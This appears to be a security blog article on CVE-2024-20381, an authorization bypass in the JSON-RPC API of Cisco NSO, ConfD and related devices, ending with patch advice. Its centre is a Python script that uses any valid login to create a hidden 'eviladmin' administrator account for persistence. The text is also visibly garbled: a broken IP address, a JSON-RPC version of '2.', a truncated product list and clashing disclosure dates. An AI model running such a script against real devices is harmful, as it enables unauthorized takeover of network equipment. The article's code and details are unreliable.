CVE-2024-20381 - How Improper JSON-RPC Authorization in Cisco NSO and ConfD Risks Your Network

In June 2024, security researchers disclosed CVE-2024-20381, a critical vulnerability impacting several Cisco products. This issue centers around the JSON-RPC API that’s baked into the web interfaces of Cisco Crosswork Network Services Orchestrator (NSO), Cisco ConfD, Cisco Optical Site Manager, and Cisco RV340 Dual WAN Gigabit VPN Routers.

Let’s break down what this flaw means, how attackers could use it, where the risk is, and what you can do to stay safe. We’ll use direct code snippets and refer to official Cisco advisories, making everything clear and practical.

What is CVE-2024-20381?

CVE-2024-20381 is caused by insufficient authorization checks on JSON-RPC API endpoints. In simple terms, if an attacker already has any valid login credentials (even a basic user), they could abuse the API to make backend configuration changes they shouldn’t be able to—like creating new admin accounts or editing system-wide settings.

> Official Cisco Advisory: Cisco Security Advisory: cisco-sa-nso-confd-jrpc-authzbyp-XvD6SHk

Step 1: Get Basic Access

The attacker starts by logging in with any valid account—even one with minimal privileges.

Step 2: Send A Malicious JSON-RPC Call

The attacker crafts a special JSON-RPC request targeting privileged API functions, since the endpoint incorrectly trusts their level of access.

Sample malicious JSON-RPC call:
Here’s an example in Python using the requests library. This code adds a new admin user on a hypothetical vulnerable device:

import requests
import json

# Replace with the target device's IP and credentials
url = 'https://10...42/api/jsonrpc';
headers = {'Content-Type': 'application/json'}
auth = ('user', 'password')  # Use any valid credentials

payload = {
    "jsonrpc": "2.",
    "method": "system.user.add",
    "params": {
        "username": "eviladmin",
        "password": "SuperSecret123!",
        "privilege": "admin"
    },
    "id": 1
}

response = requests.post(url, headers=headers, auth=auth, data=json.dumps(payload), verify=False)
print(response.text)

What happens?
Because there are no proper checks, even a low-privilege user can now create a new admin user called eviladmin!

Persistence — attacker can create secret backdoors for future access

In an enterprise environment, this could mean total loss of device and network control.

Cisco RV340 Dual WAN Gigabit VPN Routers

*For a full list, always check the latest Cisco advisory.*

How to Fix or Protect Yourself

1. Patch/Update Immediately

Cisco has released fixes—download and apply them for all affected products

- Cisco Software Downloads
- See the Cisco advisory for specifics.

Useful References

- Official Advisory: Cisco Security Advisory: cisco-sa-nso-confd-jrpc-authzbyp-XvD6SHk
- NIST NVD: CVE-2024-20381
- Cisco Software Downloads
- Python Requests Library: Official Docs

Conclusion

CVE-2024-20381 highlights the importance of proper access controls, especially in network management APIs like JSON-RPC. Attackers who can log in with any account are able to take over devices, risking the security of entire infrastructures.

Patch now, review your access, and never leave remote management interfaces open to the world!


*Stay safe. For more up-to-date security news, check Cisco’s security center.*


*This article is exclusive to help you understand and defend against real-world API vulnerabilities in modern network infrastructure.*

Timeline

Published on: 09/11/2024 17:15:12 UTC
Last modified on: 09/25/2024 17:15:15 UTC